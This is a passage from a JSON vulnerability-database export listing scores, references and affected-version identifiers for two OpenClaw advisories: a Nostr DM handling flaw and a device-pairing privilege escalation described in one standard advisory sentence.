"", "reference_type": "", "scores": [ { "value": "0.00122", "scoring_system": "epss", "scoring_elements": "0.30889", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00122", "scoring_system": "epss", "scoring_elements": "0.30923", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00122", "scoring_system": "epss", "scoring_elements": "0.30955", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35627" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/1ee9611079e81b9122f4bed01abb3d9f56206c77", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:31:53Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/1ee9611079e81b9122f4bed01abb3d9f56206c77" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:31:53Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-65h8-27jh-q8wv", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:31:53Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-65h8-27jh-q8wv" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35627", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35627" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-unauthenticated-cryptographic-work-in-nostr-inbound-dm-handling", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:31:53Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-unauthenticated-cryptographic-work-in-nostr-inbound-dm-handling" }, { "reference_url": "https://github.com/advisories/GHSA-65h8-27jh-q8wv", "reference_id": "GHSA-65h8-27jh-q8wv", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-65h8-27jh-q8wv" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api", "purl": "pkg:npm/openclaw@2026.3.22", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p3b-pfnn-x7ad" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-1smq-mbty-jkaj" }, { "vulnerability": "VCID-24m7-jx1g-hqde" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-26sv-grsd-abcw" }, { "vulnerability": "VCID-294z-6z8j-97bx" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2hca-3v8f-f3e8" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2v8n-mnws-jfc9" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-32zs-2zs9-uufs" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-37ep-9smd-zuh9" }, { "vulnerability": "VCID-384t-z1h8-pfft" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3bdd-a9nw-13bn" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4jwj-6s5z-wbeq" }, { "vulnerability": "VCID-4nwq-14y4-xkhp" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4uqc-3h1c-4yhs" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5atj-2a7b-57g5" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6849-th74-yqd5" }, { "vulnerability": "VCID-6bxd-kbse-sudx" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-8uzb-xmf8-hbca" }, { "vulnerability": "VCID-8z7r-a8dv-eueb" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9jjv-aa8k-rke1" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9pj9-7b12-jbea" }, { "vulnerability": "VCID-9uyu-y9qv-u7e1" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-9yxw-fj1c-tff9" }, { "vulnerability": "VCID-a2p8-ydn6-3bbr" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-atn7-pn13-3fgb" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-aye6-1fwu-nkc5" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bg1d-gmxy-wkc6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bk76-1ctt-tkaw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-bnfh-rsk9-cfea" }, { "vulnerability": "VCID-brfj-4shr-qkgc" }, { "vulnerability": "VCID-bumq-54sb-6ua7" }, { "vulnerability": "VCID-bzw7-yvu2-yqa2" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-csnc-r6fv-j3en" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-cvxu-rdbu-abd2" }, { "vulnerability": "VCID-cwd3-ecym-sfaw" }, { "vulnerability": "VCID-d3qp-5wm9-aqfp" }, { "vulnerability": "VCID-d864-qy75-c3dx" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dbcw-brhj-k7hs" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-djqx-bwuu-4uc1" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-gvam-2net-8kc5" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hkqd-6khg-m3hj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-j92n-5217-9bhj" }, { "vulnerability": "VCID-j96c-kau3-7fag" }, { "vulnerability": "VCID-jbwa-scg3-efeq" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jhah-j2td-t3dp" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-jtxm-z4vv-cqg7" }, { "vulnerability": "VCID-k3up-1vdf-2uh9" }, { "vulnerability": "VCID-k52b-966p-ybbk" }, { "vulnerability": "VCID-k5da-7tht-w3bs" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mggy-bv5s-5uax" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nfva-pukn-uqch" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pa1f-qzsh-efa9" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pc9z-x5wk-8ue7" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-qjvc-etb4-qbfv" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-r9y1-z2ax-z3e2" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-te8f-snty-j7hh" }, { "vulnerability": "VCID-tf28-1z2z-5yfn" }, { "vulnerability": "VCID-tk9h-nqrz-uugp" }, { "vulnerability": "VCID-u1ru-vdfp-x3hu" }, { "vulnerability": "VCID-u6hw-ffpj-4yd9" }, { "vulnerability": "VCID-u9cw-crg5-1kbs" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v1bp-hw9a-yffz" }, { "vulnerability": "VCID-v91b-1nmx-ckcx" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vm8g-hrvu-quhm" }, { "vulnerability": "VCID-vqrj-z6tx-rff2" }, { "vulnerability": "VCID-vtqt-bgz7-yub6" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2rd-2j4p-gfgw" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wkye-je9r-1fba" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wut7-y72y-9ucb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xpr3-hg3h-z3bz" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zac2-wjyt-27af" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zf3q-78js-k7ce" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22" } ], "aliases": [ "CVE-2026-35627", "GHSA-65h8-27jh-q8wv" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-849r-t5j1-vue8" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89605?format=api", "vulnerability_id": "VCID-8aek-6dw1-tudj", "summary": "Duplicate Advisory: OpenClaw Gateway: RCE and Privilege Escalation from operator.pairing to operator.admin via device.pair.approve\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-hf68-49fm-59cq. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.22 contains a privilege escalation vulnerability in the device.pair.approve method that allows an operator.pairing approver to approve pending device requests with broader operator scopes than the approver actually holds. Attackers can exploit insufficient scope validation to escalate privileges to operator.admin and achieve remote code execution on the Node infrastructure.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/fc2d29ea926f47c428c556e92ec981441228d2a4", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/fc2d29ea926f47c428c556e92ec981441228d2a4" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-hf68-49fm-59cq", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-hf68-49fm-59cq" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35639", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35639" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-device-pair-approve-scope-validation", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-device-pair-approve-scope-validation" }, { "reference_url": "https://github.com/advisories/GHSA-r3v5-2grc-429h", "reference_id": "GHSA-r3v5-2grc-429h", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-r3v5-2grc-429h" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api", "purl": "pkg:npm/openclaw@2026.3.22", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p3b-pfnn-x7ad" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-1smq-mbty-jkaj" }, { "vulnerability": "VCID-24m7-jx1g-hqde" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-26sv-grsd-abcw" }, { "vulnerability": "VCID-294z-6z8j-97bx" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2hca-3v8f-f3e8" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2v8n-mnws-jfc9" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-32zs-2zs9-uufs" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-37ep-9smd-zuh9" }, { "vulnerability": "VCID-384t-z1h8-pfft" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3bdd-a9nw-13bn" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4jwj-6s5z-wbeq" }, { "vulnerability": "VCID-4nwq-14y4-xkhp" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4uqc-3h1c-4yhs" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5atj-2a7b-57g5" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6849-th74-yqd5" }, { "vulnerability": "VCID-6bxd-kbse-sudx" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-8uzb-xmf8-hbca" }, { "vulnerability": "VCID-8z7r-a8dv-eueb" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9jjv-aa8k-rke1" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9pj9-7b12-jbea" }, { "vulnerability": "VCID-9uyu-y9qv-u7e1" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-9yxw-fj1c-tff9" }, { "vulnerability": "VCID-a2p8-ydn6-3bbr" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-atn7-pn13-3fgb" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-aye6-1fwu-nkc5" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bg1d-gmxy-wkc6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bk76-1ctt-tkaw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-bnfh-rsk9-cfea" }, { "vulnerability": "VCID-brfj-4shr-qkgc" }, { "vulnerability": "VCID-bumq-54sb-6ua7" }, { "vulnerability": "VCID-bzw7-yvu2-yqa2" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-csnc-r6fv-j3en" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-cvxu-rdbu-abd2" }, { "vulnerability": "VCID-cwd3-ecym-sfaw" }, { "vulnerability": "VCID-d3qp-5wm9-aqfp" }, { "vulnerability": "VCID-d864-qy75-c3dx" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dbcw-brhj-k7hs" }, 